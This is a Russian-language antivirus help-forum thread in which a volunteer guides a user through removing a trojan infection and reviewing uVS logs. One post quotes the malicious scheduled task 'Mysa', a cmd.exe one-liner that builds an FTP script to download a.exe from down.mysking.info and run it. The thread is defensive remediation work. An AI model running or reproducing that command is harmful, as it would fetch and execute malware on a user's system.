Saltant 0 Опубликовано 4 июня, 2017 Автор Share Опубликовано 4 июня, 2017 Скрипт выполнил, но кажется там с ошибкой, что то не удалилось. Прикрепляю лог выполнения скрипта и архив ZOO (пароль: virus) 2017-06-05_01-11-56_log.txt Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 5 июня, 2017 Share Опубликовано 5 июня, 2017 Приложите новые логи утилиты uVS. Цитата Ссылка на сообщение Поделиться на другие сайты
Saltant 0 Опубликовано 5 июня, 2017 Автор Share Опубликовано 5 июня, 2017 Прикрепляю новые логи утилиты Universal Virus Sniffer SALTANT-PK_2017-06-05_04-28-02.7z Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 5 июня, 2017 Share Опубликовано 5 июня, 2017 Сообщите, что с проблемой? Цитата Ссылка на сообщение Поделиться на другие сайты
Saltant 0 Опубликовано 5 июня, 2017 Автор Share Опубликовано 5 июня, 2017 Пока новых троянцев касперский в памяти не вылавливал, я так и не понял откуда они вообще лезли. Надеюсь то что мы тут делали, помогло закрыть им дорогу и я их больше не увижу. Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 5 июня, 2017 Share Опубликовано 5 июня, 2017 Первоначально была задача в планировщике задач: O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe Далее почистили остатки, в логах, больше ничего плохого не заметил. 1 Цитата Ссылка на сообщение Поделиться на другие сайты
Saltant 0 Опубликовано 5 июня, 2017 Автор Share Опубликовано 5 июня, 2017 Спасибо большое, недеюсь больше ничего не подцеплю Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 5 июня, 2017 Share Опубликовано 5 июня, 2017 Запустите AdwCleaner и нажмите Деинсталлировать (Uninstall).Удалите папку C:\FRST со всем содержимым.Удачи Вам! 1 Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.